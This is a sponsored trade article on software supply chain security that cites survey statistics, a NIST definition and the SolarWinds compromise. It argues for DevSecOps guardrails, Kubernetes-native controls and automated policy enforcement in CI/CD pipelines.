Improving Software Supply Chain Security with DevSecOps

64% of companies were affected by a software supply chain attack in 2021. Do you have the right controls in place?

istock 599983402

Over the past year, there have been several high-profile incidents in which attackers have attempted to compromise enterprises through the software supply chain.

A software supply chain “is anything that goes into or affects your code from development, through your CI/CD pipeline, until it gets deployed into production,” Maya Kaczorowski of Nutanix explains in a GitHub post. “It’s anything and everything that goes into your software, like code, binaries, and other components, and where they come from, like a repository or a package manager.”

Top priority for 2022

According to a recent Anchore survey, 64% of companies were affected by a software supply chain attack in 2021 and 60% have made securing the software supply chain a top 2022 priority.

“A software supply chain attack occurs when a cyber threat actor infiltrates a software vendor’s network and employs malicious code to compromise the software before the vendor sends it to their customers,” according to a report from the National Institute of Standards and Technology (NIST). “The compromised software then compromises the customer’s data or system. Newly acquired software may be compromised from the outset, or a compromise may occur through other means like a patch or hotfix.”

In 2020, a software update from systems management tools provider SolarWinds was compromised by attackers, reportedly at the behest of a foreign intelligence service,
to insert malicious code that infected thousands of the company’s customers.

Need for controls

Software supply chain attacks highlight the need for controls that can help validate the integrity of software and its components through the development, deployment, and adoption lifecycle.

Many have been able to elevate their software supply chain with the help of software development methodologies like DevOps and through substantial automation of the software development life cycle (SDLC).

The increased speed of a modern CI/CD (continuous integration and continuous delivery) pipeline and the elimination of manual checks and fixes have posed the need for additional security measures. A DevSecOps culture, tools, and automation, is a big step in the right direction, but enforcing the right practices can be challenging.

Cloud technologies, such as containers and Kubernetes, can greatly impact the shift to DevSecOps. Native security controls in Kubernetes can be primarily configured and operated directly by DevOps end users rather than relying on separate security tools that are managed by IT operations and security teams operators. All of this allows enterprises to use DevSecOps at scale for improved software supply chain security.

Employing guardrails

Even when development teams have the best intentions, making sure they do the right things is difficult without development guardrails. A secure software supply chain can provide needed guardrails that accelerate and enforce the right behaviors in key areas:

  • Security: Applications have defenses to protect them from malicious actors.
  • Compliance: Applications adhere to required controls.
  • Privacy: Applications protect sensitive information that should not be shared.
  • Transparency: Applications produce metadata—for example, about health and security posture—so that software behavior is observable and verifiable.

A secure software supply chain should automatically enforce policy requirements for testing, vulnerabilities, architecture, and instrumentation. Thus, development and deployment become repeatable and reliable. Teams can be confident that the product complies with quality and security requirements, such as not allowing code into production before it has been validated with static code analysis and security scanning tools. 

Click here for additional information.

Copyright © 2021 IDG Communications, Inc.